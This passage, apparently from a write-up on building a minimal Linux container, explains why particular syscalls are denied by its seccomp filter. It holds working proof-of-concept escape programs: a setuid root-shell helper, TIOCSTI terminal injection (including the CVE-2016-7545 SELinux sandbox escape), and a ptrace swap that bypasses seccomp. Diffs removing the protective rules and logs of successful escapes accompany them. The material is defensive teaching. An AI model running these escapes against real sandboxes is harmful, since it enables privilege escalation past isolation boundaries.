    for d in sorted(disallowed):
        sys.stdout.write("~%s~, " % d)
    sys.stdout.write("\n")

Conditionally allowed: , , clone``personality

Disallowed: , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , _sysctl``add_key``alloc_hugepages``bdflush``clock_adjtime``clock_settime``create_module``free_hugepages``get_kernel_syms``get_mempolicy``getpagesize``kern_features``kexec_file_load``kexec_load``keyctl``mbind``migrate_pages``move_pages``nfsservctl``nice``oldfstat``oldlstat``oldolduname``oldstat``olduname``pciconfig_iobase``pciconfig_read``pciconfig_write``perfctr``perfmonctl``pivot_root``ppc_rtas``preadv2``pwritev2``quotactl``readdir``request_key``set_mempolicy``setup``sgetmask``sigaction``signal``sigpending``sigprocmask``sigsuspend``spu_create``spu_run``ssetmask``subpage_prot``swapoff``swapon``sync_file_range2``sysfs``uselib``userfaultfd``ustat``utrap_install``vm86``vm86old

self_setuid.c
/* -*- compile-command: "gcc -Wall -Werror -static self_setuid.c -o self_setuid" -*- */
#define _GNU_SOURCE
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

int main (int argc, char **argv)
{
	if (argc == 2 && !strcmp(argv[1], "shell")) {
		if (setresuid(0, 0, 0)) {
			fprintf(stderr, "++ setresuid(0, 0, 0) failed: %m\n");
			return 1;
		}
		return system("sh");
	} else {
		if (chown(argv[0], 0, 0)) {
			fprintf(stderr, "++ chown failed: %m\n");
			return 1;
		}
		int self_fd = 0;
		if (!(self_fd = open(argv[0], 0))) {
			fprintf(stderr, "++ fopen failed: %m\n");
			return 1;
		}
		if (chmod(argv[0], S_ISUID | S_IXOTH)
		    && fchmod(self_fd, S_ISUID | S_IXOTH)
		    && fchmodat(AT_FDCWD, argv[0], S_ISUID | S_IXOTH, 0)) {
			fprintf(stderr, "++ chmod  / fchmod / fchmodat failed: %m\n");
			close(self_fd);
			return 1;
		}
		close(self_fd);
		return 0;
	}
}
allow_chmod.diff
diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..b471a69 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -151,18 +151,6 @@ int syscalls()
 	scmp_filter_ctx ctx = NULL;
 	fprintf(stderr, "=> filtering syscalls...");
 	if (!(ctx = seccomp_init(SCMP_ACT_ALLOW))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(chmod), 1,
-				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(chmod), 1,
-				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmod), 1,
-				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmod), 1,
-				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmodat), 1,
-				SCMP_A2(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmodat), 1,
-				SCMP_A2(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(unshare), 1,
 				SCMP_A0(SCMP_CMP_MASKED_EQ, CLONE_NEWUSER, CLONE_NEWUSER))
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(clone), 1,
[lizzie@empress l-c-i-500-l]$sudo ./contained -m . -u 0 -c ./self_setuid
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.EXwjdL...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.  ++ chmod / fchmod / fchmodat failed:
Operation not permitted
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$sudo ./contained.allow_chmod -m . -u 0 -c ./self_setuid
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.35HO0W...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$./self_setuid shell
sh-4.3#whoami
root
sh-4.3# exit
[lizzie@empress l-c-i-500-l]$rm ./self_setuid

I heard about this pretty recently because of CVE-2016-7545, an SELinux bug:

CVE-2016-7545 -- SELinux sandbox escape from Federico Bento

Hi,

When executing a program via the SELinux sandbox, the nonpriv session
can escape to the parent session by using the TIOCSTI ioctl to push
characters into the terminal's input buffer, allowing an attacker to
escape the sandbox.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>

int main()
{
     char *cmd = "id\n";
     while(*cmd)
      ioctl(0, TIOCSTI, cmd++);
     execlp("/bin/id", "id", NULL);
}

$ gcc test.c -o test
$ /bin/sandbox ./test
id
uid=1000 gid=1000 groups=1000
context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176
$ id    <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Bug report:
https://bugzilla.redhat.com/show_bug.cgi?id=1378577

Upstream fix:
https://marc.info/?l=selinux&m=147465160112766&w=2
https://marc.info/?l=selinux&m=147466045909969&w=2
https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379

Federico Bento.
tiocsti.c
/* -*- compile-command: "gcc -Wall -Werror -static tiocsti.c -o tiocsti" -*- */
/* adapted from http://www.openwall.com/lists/oss-security/2016/09/25/1 */
#include <unistd.h>
#include <sys/ioctl.h>
#include <stdio.h>

int main()
{
     for (char *cmd = "id\n"; *cmd; cmd++) {
	     if (ioctl(STDIN_FILENO, TIOCSTI, cmd)) {
		     fprintf(stderr, "++ ioctl failed: %m\n");
		     return 1;
	     }
     }
     return 0;
}
allow_tiocsti.diff
diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..5fb25bd 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -167,8 +167,6 @@ int syscalls()
 				SCMP_A0(SCMP_CMP_MASKED_EQ, CLONE_NEWUSER, CLONE_NEWUSER))
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(clone), 1,
 				SCMP_A0(SCMP_CMP_MASKED_EQ, CLONE_NEWUSER, CLONE_NEWUSER))
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(ioctl), 1,
-				SCMP_A1(SCMP_CMP_MASKED_EQ, TIOCSTI, TIOCSTI))
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(keyctl), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(add_key), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(request_key), 0)
[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c ./tiocsti 
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.P5QATt...done.
=> trying a user namespace...writing /proc/1819/uid_map...writing
/proc/1819/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.  ++ ioctl failed: Operation not
permitted
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_tiocsti -m . -u 0 -c ./tiocsti 
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.J9mulv...done.
=> trying a user namespace...writing /proc/1865/uid_map...writing
/proc/1865/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
id
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ uid=1000(lizzie) gid=1000(lizzie) groups=1000(lizzie)

There’s a notion of “user keyrings”, that I believe are user-namespaced, but that’s it.

man 7 keyrings

	User keyrings
		Each UID known to the kernel has a record that contains
		two  keyrings: The  user keyring  and the  user session
		keyring.  These exist for as  long as the UID record in
		the  kernel exists.   A  link to  the  user keyring  is
		placed in a  new session keyring by  pam_keyinit when a
		new login session is initiated.

man 2 seccomp says:

The seccomp check will not be run again after the tracer is notified. (This means that seccomp-based sandboxes must not allow use of ptrace(2)–even of other sandboxed processes–without extreme care; ptracers can use this mechanism to escape from the seccomp sandbox.)

Here’s an example (remember that our seccomp profile should prevent : chmod(x, I_SUID)

ptrace_breaks_seccomp.c
/* -*- compile-command: "gcc -Wall -Werror -static ptrace_breaks_seccomp.c -o ptrace_breaks_seccomp" -*- */
#include <sys/stat.h>
#include <stdio.h>
#include <sys/ptrace.h>
#include <unistd.h>
#include <sys/types.h>
#include <signal.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <stddef.h>
#include <sys/syscall.h>

#define MAGIC_SYSCALL 666

int main (int argc, char **argv)
{
	pid_t child = 0;
	switch ((child = fork())) {
	case -1:
		fprintf(stderr, "++ fork failed: %m\n");
		return 1;
	case 0:;
		fprintf(stderr, "++ child stopping itself.\n");
		if (kill(getpid(), SIGSTOP)) {
			fprintf(stderr, "++ kill failed: %m\n");
			return 1;
		}
		fprintf(stderr, "++ child continued\n");
		/* pick an arbitrary syscall number. our tracer will change it to chmod. */
		if (syscall(MAGIC_SYSCALL, argv[0], S_ISUID | S_IRUSR | S_IWUSR | S_IXUSR)) {
			fprintf(stderr, "chmod-via-nanosleep failed: %m\n");
			return 1;
		}
		fprintf(stderr, "++ chmod succeeded, child finished.\n");
		break;
	default:;
		int status = 0;
		if (ptrace(PTRACE_ATTACH,child, NULL, NULL)) {
			fprintf(stderr, "++ ptrace failed: %m\n");
			return 1;
		}
		waitpid(child, &status, 0);
		if (!(status & SIGSTOP)) {
			fprintf(stderr, "++ expected SIGSTOP in child.\n");
			return 1;
		}
		struct user_regs_struct regs = {0};
		while (1) {
			if (ptrace(PTRACE_GETREGS, child, 0, &regs)) {
				fprintf(stderr, "++ getting child registers failed: %m\n");
				return 1;
			}
			if (!(regs.orig_rax == MAGIC_SYSCALL)) {
				if (ptrace(PTRACE_SYSCALL, child, 0, 0)) {
					fprintf(stderr, "++ continuing the process failed.\n");
					return 1;
				}
				waitpid(child, &status, 0);
				if (!(status & SIGTRAP)) {
					fprintf(stderr, "++ expected SIGTRAP in child.\n");
					return 1;
				}
			} else {
				fprintf(stderr, "++ got MAGIC_SYSCALL!\n");
				regs.orig_rax = SYS_chmod;
				if (ptrace(PTRACE_SETREGS, child, 0, &regs)) {
					fprintf(stderr, "++ continuing child failed: %m\n");
					return 1;
				}
				if (ptrace(PTRACE_CONT, child, 0, 0)) {
					fprintf(stderr, "++ continuing child failed: %m\n");
					return 1;
				}
				break;
			}
		}
		waitpid(child, NULL, 0);
		fprintf(stderr, "++ finished waiting.\n");

		break;
	}
	return 0;
}
allow_ptrace.diff
diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 2291ecb..42ecbc6 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -173,7 +173,6 @@ int syscalls()
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(keyctl), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(add_key), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(request_key), 0)
-	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(ptrace), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(mbind), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(migrate_pages), 0)
 	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(move_pages), 0)
[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c ./ptrace_breaks_seccomp 
=> validating Linux version...4.7.6-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.EiZRVH...done.
=> trying a user namespace...unsupported? continuing.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ child stopping itself.
++ ptrace failed: Operation not permitted
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_ptrace -m . -u 0 -c ./ptrace_breaks_seccomp 
=> validating Linux version...4.7.6-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.ThyjKm...done.
=> trying a user namespace...unsupported? continuing.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ child stopping itself.
++ child continued
++ got MAGIC_SYSCALL!
++ chmod succeeded, child finished.
++ finished waiting.
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ ls -lh ptrace_breaks_seccomp 
-rws------ 1 lizzie lizzie 793K Oct 11 14:55 ptrace_breaks_seccomp

This seems to have been fixed in June by Kees Cook:

run seccomp after ptrace on LKML

There has been a long-standing (and documented) issue with seccomp
where ptrace can be used to change a syscall out from under seccomp.
This is a problem for containers and other wider seccomp filtered
environments where ptrace needs to remain available, as it allows
for an escape of the seccomp filter.

Since the ptrace attack surface is available for any allowed syscall,
moving seccomp after ptrace doesn't increase the actually available
attack surface. And this actually improves tracing since, for
example, tracers will be notified of syscall entry before seccomp
sends a SIGSYS, which makes debugging filters much easier.

The per-architecture changes do make one (hopefully small)
semantic change, which is that since ptrace comes first, it may
request a syscall be skipped. Running seccomp after this doesn't
make sense, so if ptrace wants to skip a syscall, it will bail
out early similarly to how seccomp was. This means that skipped
syscalls will not be fed through audit, though that likely means
we're actually avoiding noise this way.

This series first cleans up seccomp to remove the now unneeded
two-phase entry, fixes the SECCOMP_RET_TRACE hole (same as the
ptrace hole above), and then reorders seccomp after ptrace on
each architecture.

Thanks,

-Kees

This patchset made it into the kernel at 4.8. See for example 93e35e:

  [lizzie@empress linux-stable]$ git branch --contains 93e35efb8de45393cf61ed07f7b407629bf698ea
  * linux-4.8.y
    master

This is, as far as I can tell, only documented in the kernel tree:

Documentation/vm/userfaultfd.txt@c8d2bc

= Userfaultfd =

== Objective ==

Userfaults allow the implementation of on-demand paging from userland
and more generally they allow userland to take control of various
memory page faults, something otherwise only the kernel code could do.

[...]

= API ==

When first opened the userfaultfd must be enabled invoking the
UFFDIO_API ioctl specifying a uffdio_api.api value set to UFFD_API (or
a later API version) which will specify the read/POLLIN protocol
userland intends to speak on the UFFD and the uffdio_api.features
userland requires. The UFFDIO_API ioctl if successful (i.e. if the
requested uffdio_api.api is spoken also by the running kernel and the
requested features are going to be enabled) will return into
uffdio_api.features and uffdio_api.ioctls two 64bit bitmasks of
respectively all the available features of the read(2) protocol and
the generic ioctl available.

Once the userfaultfd has been enabled the UFFDIO_REGISTER ioctl should
be invoked (if present in the returned uffdio_api.ioctls bitmask) to
register a memory range in the userfaultfd by setting the
uffdio_register structure accordingly. The uffdio_register.mode
bitmask will specify to the kernel which kind of faults to track for
the range (UFFDIO_REGISTER_MODE_MISSING would track missing
pages). The UFFDIO_REGISTER ioctl will return the
uffdio_register.ioctls bitmask of ioctls that are suitable to resolve
userfaults on the range registered. Not all ioctls will necessarily be
supported for all memory types depending on the underlying virtual
memory backend (anonymous memory vs tmpfs vs real filebacked
mappings).

Userland can use the uffdio_register.ioctls to manage the virtual
address space in the background (to add or potentially also remove
memory from the userfaultfd registered range). This means a userfault
could be triggering just before userland maps in the background the
user-faulted page.

The primary ioctl to resolve userfaults is UFFDIO_COPY. That
atomically copies a page into the userfault registered range and wakes
up the blocked userfaults (unless uffdio_copy.mode &
UFFDIO_COPY_MODE_DONTWAKE is set). Other ioctl works similarly to
UFFDIO_COPY. They're atomic as in guaranteeing that nothing can see an
half copied page since it'll keep userfaulting until the copy has
finished.

Jann Horn described this to me, and linked to his vulnerability and exploit:

In order to make exploitation more reliable, the attacker should be able to pause code execution in the kernel between the writability check of the target file and the actual write operation. This can be done by abusing the writev() syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays read accesses, then mmap()s a file containing a struct iovec from that FUSE filesystem and passes the result of mmap() to writev(). (Another way to do this would be to use the userfaultfd() syscall.)

It was also used by Vitaly Nikolenko in his proof-of-concept for CVE-2016-6187:

[…]

If we could overwrite the cleanup function pointer (remember that this object is now allocated in user space), then we’ll have arbitrary code execution with CPL=0. The only problem is that subprocess_info object allocation and freeing happens on the same path. One way to modify the object’s function pointer is to somehow suspend the execution before info->cleanup)(info) gets called and set the function pointer to our privilege escalation payload. I could have found other objects of the same size with two “separate” paths for allocation and function triggering but I needed a reason to try userfaultfd() and the page splitting idea.

The userfaultfd syscall can be used to handle page faults in user space. We can allocate a page in user space and set up a handler (as a separate thread); when this page is accessed either for reading or writing, execution will be transferred to the user-space handler to deal with the page fault. There’s nothing new here and this was mentioned by Jann Hornh

[…].

Allocate two consecutive pages, split the object over these two pages (as before) and set up the page handler for the second page.

When the user-space PF is triggered by memset, set up another user-space PF handler but for the first page.

The next user-space PF will be triggered when object variables (located in the first page) get initialised in call_usermodehelper_setup. At this point, set up another PF for the second page.

Finally, the last user-space PF handler can modify the cleanup function pointer (by setting it to our privilege escalation payload or a ROP chain) and set the path member to 0 (since these members are all located in the first page and already initialised).

Setting up user-space PF handlers for already “page-faulted” pages can be accomplished by munmapping/mapping these pages again and then passing them to userfaultfd(). The PoC for 4.5.1 can be found here. There’s nothing specific to the kernel version though (it should work on all vulnerable kernels). There’s no privilege escalation payload but the PoC will execute instructions at the user-space address 0xdeadbeef.

man 2 perf_event_open

    PERF_EVENT_OPEN(2) -- 2016-07-17 -- Linux -- Linux Programmer's Manual

    NAME
            perf_event_open - set up performance monitoring

    SYNOPSIS
            #include <linux/perf_event.h>
            #include <linux/hw_breakpoint.h>

            int perf_event_open(struct perf_event_attr *attr,
                                            pid_t pid, int cpu, int group_fd,
                                            unsigned long flags);

            Note: There  is no glibc  wrapper for this system  call; see
            NOTES.

    DESCRIPTION
            [...]

    Arguments

         The pid and cpu arguments allow specifying which process and
         CPU to monitor:

         pid == 0 and cpu == -1
                 This measures the calling process/thread on any CPU.

         pid == 0 and cpu >= 0
                 This  measures  the  calling process/thread  only  when
                 running on the specified CPU.

         pid > 0 and cpu == -1
                 This measures the specified process/thread on any CPU.

         pid > 0 and cpu >= 0
                 This  measures the  specified process/thread  only when
                 running on the specified CPU.

         pid == -1 and cpu >= 0
                 This  measures all  processes/threads on  the specified
                 CPU.   This  requires  CAP_SYS_ADMIN  capability  or  a
                 /proc/sys/kernel/perf_event_paranoid value of less than
                 1.

         pid == -1 and cpu == -1
                 This setting is invalid and will return an error.

If a pid is specified, the corresponding process is found within the namespace:

kernel/events/core.c:9376@c8d2bc

    /**
     * sys_perf_event_open - open a performance event, associate it to a task/cpu
     *
     * @attr_uptr:  event_id type attributes for monitoring/sampling
     * @pid:                target pid
     * @cpu:                target cpu
     * @group_fd:           group leader event fd
     */
    SYSCALL_DEFINE5(perf_event_open,
                    struct perf_event_attr __user *, attr_uptr,
                    pid_t, pid, int, cpu, int, group_fd, unsigned long, flags)
    {
            /* ... */

            if (pid != -1 && !(flags & PERF_FLAG_PID_CGROUP)) {
                    task = find_lively_task_by_vpid(pid);
                    if (IS_ERR(task)) {
                            err = PTR_ERR(task);
                            goto err_group_fd;
                    }
            }

            /* ... */
    }

kernel/events/core.c:3621@c8d2bc

    static struct task_struct *
    find_lively_task_by_vpid(pid_t vpid)
    {
            struct task_struct *task;

            rcu_read_lock();
            if (!vpid)
                    task = current;
            else
                    task = find_task_by_vpid(vpid);
            if (task)
                    get_task_struct(task);
            rcu_read_unlock();

            if (!task)
                    return ERR_PTR(-ESRCH);

            return task;
    }

kernel/pid.c:459@c8d2bc

    struct task_struct *find_task_by_vpid(pid_t vnr)
    {
            return find_task_by_pid_ns(vnr, task_active_pid_ns(current));
    }

The Relevant commit is 0161028, whose commit message gives a good description of the problems:

commit 0161028b7c8aebef64194d3d73e43bc3b53b5c66
Author: Andy Lutomirski <redacted>
Date:   Mon May 9 15:48:51 2016 -0700

    perf/core: Change the default paranoia level to 2
    
    Allowing unprivileged kernel profiling lets any user dump follow kernel
    control flow and dump kernel registers.  This most likely allows trivial
    kASLR bypassing, and it may allow other mischief as well.  (Off the top
    of my head, the PERF_SAMPLE_REGS_INTR output during /dev/urandom reads
    could be quite interesting.)
    
    Signed-off-by: Andy Lutomirski <redacted>
    Acked-by: Kees Cook <redacted>
    Signed-off-by: Linus Torvalds <redacted>

diff --git a/Documentation/sysctl/kernel.txt b/Documentation/sysctl/kernel.txt
index 57653a4..fcddfd5 100644
--- a/Documentation/sysctl/kernel.txt
+++ b/Documentation/sysctl/kernel.txt
@@ -645,7 +645,7 @@ allowed to execute.
 perf_event_paranoid:
 
 Controls use of the performance events system by unprivileged
-users (without CAP_SYS_ADMIN).  The default value is 1.
+users (without CAP_SYS_ADMIN).  The default value is 2.
 
  -1: Allow use of (almost) all events by all users
 >=0: Disallow raw tracepoint access by users without CAP_IOC_LOCK
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 4e2ebf6..c0ded24 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -351,7 +351,7 @@ static struct srcu_struct pmus_srcu;
  *   1 - disallow cpu events for unpriv
  *   2 - disallow kernel profiling for unpriv
  */
-int sysctl_perf_event_paranoid __read_mostly = 1;
+int sysctl_perf_event_paranoid __read_mostly = 2;
 
 /* Minimum for 512 kiB + 1 user control page */

This is included in 4.6:

[lizzie@empress linux]$ git tag --contains 0161028b7c8aebef64194d3d73e43bc3b53b5c66
v4.6
v4.7
v4.7-rc1
v4.7-rc2
v4.7-rc3
v4.7-rc4
v4.7-rc5
v4.7-rc6
v4.7-rc7
v4.8
v4.8-rc1
v4.8-rc2
v4.8-rc3
v4.8-rc4
v4.8-rc5
v4.8-rc6
v4.8-rc7
v4.8-rc8

Thanks to Jann Horn for pointing this out.

Documentation/prctl/no_new_privs.txt@c8d2bc

The execve system call can grant a newly-started program privileges that its parent did not have. The most obvious examples are setuid/setgid programs and file capabilities. […] Any task can set no_new_privs. Once the bit is set, it is inherited across fork, clone, and execve and cannot be unset. With no_new_privs set, execve promises not to grant the privilege to do anything that could not have been done without the execve call.

man 2 seccomp

		In order to  use the SECCOMP_SET_MODE_FILTER operation,
		either   the  caller   must   have  the   CAP_SYS_ADMIN
		capability in  its user  namespace, or the  thread must
		already have the no_new_privs bit set.  If that bit was
		not  already set  by an  ancestor of  this thread,  the
		thread must make the following call:

		    prctl(PR_SET_NO_NEW_PRIVS, 1);

		Otherwise,  the SECCOMP_SET_MODE_FILTER  operation will
		fail  and return  EACCES  in  errno.  This  requirement
		ensures  that an  unprivileged process  cannot apply  a
		malicious filter and then invoke a set-user-ID or other
		privileged  program using  execve(2), thus  potentially
		compromising  that program.   (Such a  malicious filter
		might, for  example, cause an attempt  to use setuid(2)
		to  set the  caller's user  IDs to  non-zero values  to
		instead  return 0  without actually  making the  system
		call.   Thus,   the  program  might  be   tricked  into
		retaining superuser  privileges in  circumstances where
		it is possible  to influence it to  do dangerous things
		because it did not actually drop privileges.)

It took me a while to internalize this behavior. My impression was that without , seccomp filters would be dropped across a exec. This would lead to an easy way to escape : PR_SET_NO_NEW_PRIVS``setuid``seccomp

Create a setuid executable that calls some filtered syscall.
Become a non-root user.
Execute that setuid executable.

But that’s actually not the case. Instead, you just can’t set seccomp filters unless you have one of the following:

PR_SET_NO_NEW_PRIVS == 1
CAP_SYS_ADMIN

and so libseccomp sets by default. PR_SET_NO_NEW_PRIVS

Here’s the code I thought would work:

setuidd_lower_reexec_and_escape.c
/* -*- compile-command: "gcc -Wall -Werror -static setuidd_lower_reexec_and_escape.c -o setuidd_lower_reexec_and_escape" -*- */
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>

int main (int argc, char **argv)
{
	if (argc == 1) {
		if (setresuid(99, 99, 99)) {
			fprintf(stderr, "++ setresuid failed: %m\n");
			return 1;
		}
		if (execve(argv[0], (char *[]) {argv[0], "-", 0}, NULL)) {
			fprintf(stderr, "++ execve failed: %m\n");
			return 1;
		}
	} else {
		uid_t a, b, c = 0;
		getresuid(&a, &b, &c);
		fprintf(stderr, "++ we're %u/%u/%u.\n", a, b, c);
		if (ioctl(STDIN_FILENO, TIOCSTI, "!")) {
		     fprintf(stderr, "++ ioctl failed: %m\n");
		     return 1;
		}
	}
}

but it doesn’t :

[lizzie@empress l-c-i-500-l]$sudo chown root setuidd_lower_reexec_and_escape
[lizzie@empress l-c-i-500-l]$sudo chmod 4007 setuidd_lower_reexec_and_escape
[lizzie@empress l-c-i-500-l]$sudo ./contained -m . -u 0 -c ./setuidd_lower_reexec_and_escape
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.ZM2vnz...done.
=> trying a user namespace...writing /proc/2095/uid_map...writing
/proc/2095/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.  ++ we're 99/99/99.  ++ ioctl failed:
Operation not permitted
=> cleaning cgroups...done.

Here’s the code responsible for that check:

kernel/seccomp.c:340@c8d2bc

/**
 * seccomp_prepare_filter: Prepares a seccomp filter for use.
 * @fprog: BPF program to install
 *
 * Returns filter on success or an ERR_PTR on failure.
 */
static struct seccomp_filter *seccomp_prepare_filter(struct sock_fprog *fprog)
{
	struct seccomp_filter *sfilter;
	int ret;
	const bool save_orig = IS_ENABLED(CONFIG_CHECKPOINT_RESTORE);

	if (fprog->len == 0 || fprog->len > BPF_MAXINSNS)
		return ERR_PTR(-EINVAL);

	BUG_ON(INT_MAX / fprog->len < sizeof(struct sock_filter));

	/*
	 * Installing a seccomp filter requires that the task has
	 * CAP_SYS_ADMIN in its namespace or be running with no_new_privs.
	 * This avoids scenarios where unprivileged tasks can affect the
	 * behavior of privileged children.
	 */
	if (!task_no_new_privs(current) &&
	    security_capable_noaudit(current_cred(), current_user_ns(),
				     CAP_SYS_ADMIN) != 0)
		return ERR_PTR(-EACCES);

	/* Allocate a new seccomp_filter */
	sfilter = kzalloc(sizeof(*sfilter), GFP_KERNEL | __GFP_NOWARN);
	if (!sfilter)
		return ERR_PTR(-ENOMEM);

	ret = bpf_prog_create_from_user(&sfilter->prog, fprog,
					seccomp_check_filter, save_orig);
	if (ret < 0) {
		kfree(sfilter);
		return ERR_PTR(ret);
	}

	atomic_set(&sfilter->usage, 1);

	return sfilter;
}

and the code that unconditionally propagates seccomp filters across exec:

kernel/fork.c:1268@c8d2bc

static void copy_seccomp(struct task_struct *p)
{
#ifdef CONFIG_SECCOMP
	/*
	 * Must be called with sighand->lock held, which is common to
	 * all threads in the group. Holding cred_guard_mutex is not
	 * needed because this new task is not yet running and cannot
	 * be racing exec.
	 */
	assert_spin_locked(&current->sighand->siglock);

	/* Ref-count the new filter user, and assign it. */
	get_seccomp_filter(current);
	p->seccomp = current->seccomp;

	/*
	 * Explicitly enable no_new_privs here in case it got set
	 * between the task_struct being duplicated and holding the
	 * sighand lock. The seccomp state and nnp must be in sync.
	 */
	if (task_no_new_privs(current))
		task_set_no_new_privs(p);

	/*
	 * If the parent gained a seccomp mode after copying thread
	 * flags and between before we held the sighand lock, we have
	 * to manually enable the seccomp thread flag here.
	 */
	if (p->seccomp.mode != SECCOMP_MODE_DISABLED)
		set_tsk_thread_flag(p, TIF_SECCOMP);
#endif
}

(called by in kernel/fork.c@c8d2bc). copy_process

man 2 _sysctl

NOTES
	Glibc does not provide a  wrapper for this system call; call
	it using  syscall(2).  Or rather...   don't call it:  use of
	this system  call has  long been discouraged,  and it  is so
	unloved that  it is likely  to disappear in a  future kernel
	version.   Since  Linux 2.6.24,  uses  of  this system  call
	result in warnings  in the kernel log.  Remove  it from your
	programs now; use the /proc/sys interface instead.

	This  system  call  is  available only  if  the  kernel  was
	configured with the CONFIG_SYSCTL_SYSCALL option.

init/Kconfig:1420@c8d2bc

config SYSCTL_SYSCALL
	bool "Sysctl syscall support" if EXPERT
	depends on PROC_SYSCTL
	default n
	select SYSCTL
	---help---
	  sys_sysctl uses binary paths that have been found challenging
